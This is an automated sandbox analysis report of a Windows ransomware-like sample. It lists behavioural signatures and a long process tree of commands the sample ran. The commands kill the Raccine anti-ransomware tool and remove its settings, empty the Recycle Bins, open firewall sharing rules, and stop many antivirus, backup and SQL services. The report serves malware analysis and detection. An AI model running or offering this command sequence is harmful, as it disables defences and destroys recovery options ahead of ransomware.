Analysis
-
max time kernel
151s -
max time network
60s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
28-05-2021 09:57
General
-
Target
0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
-
Size
370KB
-
MD5
b8421f1d4bd96ca5b1e9a6e919e6a167
-
SHA1
e1040ad363c3a5bb7587faebaab0aecdc70a21df
-
SHA256
0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f
-
SHA512
e2ee73d80631d51d4d5267f34e6c7873c79fe1968d73daea141d782fc693fb6f436be18c9a3756fca3e68a44e2e75c9376e194f3ab11f95942e93b3a28117b63
Score
10/10
Malware Config
Signatures
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
Disables Task Manager via registry modification
-
Modifies Windows Firewall 1 TTPs
-
Modifies file permissions 1 TTPs 64 IoCs
-
Windows security modification 2 TTPs 1 IoCs
-
Modifies WinLogon 2 TTPs 2 IoCs
-
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Discovers systems in the same network 1 TTPs 1 IoCs
-
Kills process with taskkill 57 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 61 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
System policy modification 1 TTPs 4 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe"C:\Users\Admin\AppData\Local\Temp\0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe"1⤵
- Windows security modification
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM RaccineSettings.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\reg.exe"reg" delete HKCU\Software\Raccine /F2⤵
- Modifies registry key
-
-
C:\Windows\system32\schtasks.exe"schtasks" /DELETE /TN "Raccine Rules Updater" /F2⤵
-
-
C:\Windows\system32\reg.exe"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F2⤵
-
-
C:\Windows\system32\sc.exe"sc.exe" config Dnscache start= auto2⤵
-
-
C:\Windows\system32\sc.exe"sc.exe" config SQLTELEMETRY start= disabled2⤵
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin2⤵
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c rd /s /q D:\\$Recycle.bin2⤵
-
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes2⤵
-
-
C:\Windows\system32\sc.exe"sc.exe" config upnphost start= auto2⤵
-
-
C:\Windows\system32\sc.exe"sc.exe" config SSDPSRV start= auto2⤵
-
-
C:\Windows\system32\sc.exe"sc.exe" config SstpSvc start= disabled2⤵
-
-
C:\Windows\system32\sc.exe"sc.exe" config FDResPub start= auto2⤵
-
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes2⤵
-
-
C:\Windows\system32\net.exe"net.exe" start Dnscache /y2⤵
-
-
C:\Windows\system32\sc.exe"sc.exe" config SQLWriter start= disabled2⤵
-
-
C:\Windows\system32\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled2⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$SQL_2008 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SQL_2008 /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop EhttpSrv /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EhttpSrv /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" start SSDPSRV /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start SSDPSRV /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EsgShKernel /y4⤵
-
-
-
-
C:\Windows\system32\net.exe"net.exe" start upnphost /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start upnphost /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MBAMService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MBAMService /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamHvIntegrationSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop McAfeeFramework /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeFramework /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLServerADHelper100 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper100 /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop McAfeeEngineService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeEngineService /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$TPS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$TPS /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop ARSM /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ARSM /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos MCS Client” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos MCS Client” /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop msexchangeimap4 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop msexchangeimap4 /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “intel(r) proset monitoring service” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “intel(r) proset monitoring service” /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSOLAP$TPSAMA /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$TPSAMA /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop AcrSch2Svc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos MCS Agent” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos MCS Agent” /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop msexchangeadtopology /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop msexchangeadtopology /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “aphidmonitorservice” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “aphidmonitorservice” /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSOLAP$TPS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$TPS /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Zoolz 2 Service” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Zoolz 2 Service” /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop ReportServer$TPSAMA /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$TPSAMA /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos Health Service” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Health Service” /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSExchangeSRS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeSRS /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop W3Svc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop W3Svc /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSOLAP$SYSTEM_BGC /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Veeam Backup Catalog Data Service” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Veeam Backup Catalog Data Service” /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop ReportServer$TPS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$TPS /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos File Scanner Service” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos File Scanner Service” /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSExchangeSA /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeSA /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop UI0Detect /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop UI0Detect /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSOLAP$SQL_2008 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Symantec System Recovery” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Symantec System Recovery” /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop ReportServer$SYSTEM_BGC /y2⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos Device Control Service” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Device Control Service” /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSExchangeMTA /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeMTA /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SstpSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SstpSvc /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop msftesql$PROD /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop msftesql$PROD /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “SQLsafe Filter Service” /y2⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop ReportServer$SQL_2008 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$SQL_2008 /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SMTPSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SMTPSvc /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos Clean Service” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Clean Service” /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSExchangeMGMT /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeMGMT /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop POP3Svc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop POP3Svc /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MsDtsServer110 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MsDtsServer110 /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “SQLsafe Backup Service” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “SQLsafe Backup Service” /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop ReportServer /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SamSs /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SamSs /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos AutoUpdate Service” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos AutoUpdate Service” /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSExchangeIS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeIS /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop NetMsmqActivator /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop NetMsmqActivator /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MsDtsServer100 /y2⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop “SQL Backups /y2⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop “Enterprise Client Service” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Enterprise Client Service” /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop EraserSvc11710 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EraserSvc11710 /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos Agent” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Agent” /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSExchangeES /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeES /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop IISAdmin /y2⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop MsDtsServer /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MsDtsServer /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Acronis VSS Provider” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Acronis VSS Provider” /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop sophos /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sophos /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop CAARCUpdateSvc /y2⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop CASAD2DWebSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfewc /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop AcronisAgent /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop AcrSch2Svc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecRPCService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecManagementService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecJobEngine /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecDiveciMediaService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecDiveciMediaService /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecAgentBrowser /y2⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop QBCFMonitorService /y2⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop mfevtp /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ekrn /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop RESvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop wbengine /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop wbengine /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop mfemms /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfemms /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop ReportServer$SQL_2008 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$SQL_2008 /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop wbengine /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop wbengine /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop mfefire /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfefire /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop PDVFSService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop PDVFSService /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop EsgShKernel /y2⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$TPSAMA /y2⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop ntrtscan /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ntrtscan /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop EPUpdateService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EPUpdateService /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$VEEAMSQL2008R2 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamMountSvc /y2⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLServerADHelper /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamEnterpriseManagerSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MBEndpointAgent /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MBEndpointAgent /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLSERVER /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLSERVER /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamDeploySvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamDeploySvc /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamDeploymentService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamTransportSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VSNAPVSS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VSNAPVSS /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop stc_raw_agent /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop stc_raw_agent /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop zhudongfangyu /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop zhudongfangyu /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop YooIT /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop YooIT /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop YooBackup /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop YooBackup /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLFDLauncher$TPSAMA /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamDeploymentService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop masvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop masvc /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLFDLauncher$TPS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamCloudSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamCloudSvc /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop macmnsvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop macmnsvc /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamCatalogSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamCatalogSvc /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop klnagent /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop klnagent /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLFDLauncher$SQL_2008 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamBrokerSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamBrokerSvc /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop kavfsslp /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop kavfsslp /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLFDLauncher$SHAREPOINT /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamBackupSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamBackupSvc /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop KAVFSGT /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop KAVFSGT /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLFDLauncher$SBSMONITORING /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLWriter /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLWriter /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop KAVFS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop KAVFS /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$VEEAMSQL2008R2 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop FA_Scheduler /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop FA_Scheduler /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$VEEAMSQL2012 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SDRSVC /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SDRSVC /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop ESHASRV /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ESHASRV /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$VEEAMSQL2008R2 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop Intuit.QuickBooks.FCS /y2⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop EPSecurityService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EPSecurityService /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$SYSTEM_BGC /y2⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop QBIDPService /y2⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop mozyprobackup /y2⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop McAfeeDLPAgentService /y2⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop QBFCService /y2⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop RTVscan /y2⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop SavRoam /y2⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop ccSetMgr /y2⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop ccEvtMgr /y2⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop DefWatch /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MsDtsServer100 /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop NetBackup BMR MTFTP Service /y2⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop BMR Boot Service /y2⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop ekrn /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfevtp /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop mfewc /y2⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$SQLEXPRESS /y2⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop MMS /y2⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop avpsus /y2⤵
-
-
C:\Windows\system32\net.exe"net.exe" start FDResPub /y2⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop bedbg /y2⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLServerOLAPService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLServerOLAPService /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop sms_site_sql_backup /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sms_site_sql_backup /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$BKUPEXEC /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamNFSSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop McAfeeFrameworkMcAfeeFramework /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos Safestore Service” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Safestore Service” /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop TrueKeyScheduler /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TrueKeyScheduler /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop vapiendpoint /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop vapiendpoint /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SAVService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SAVService /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecAgentAccelerator /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecVSSProvider /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop PDVFSService /y2⤵
-
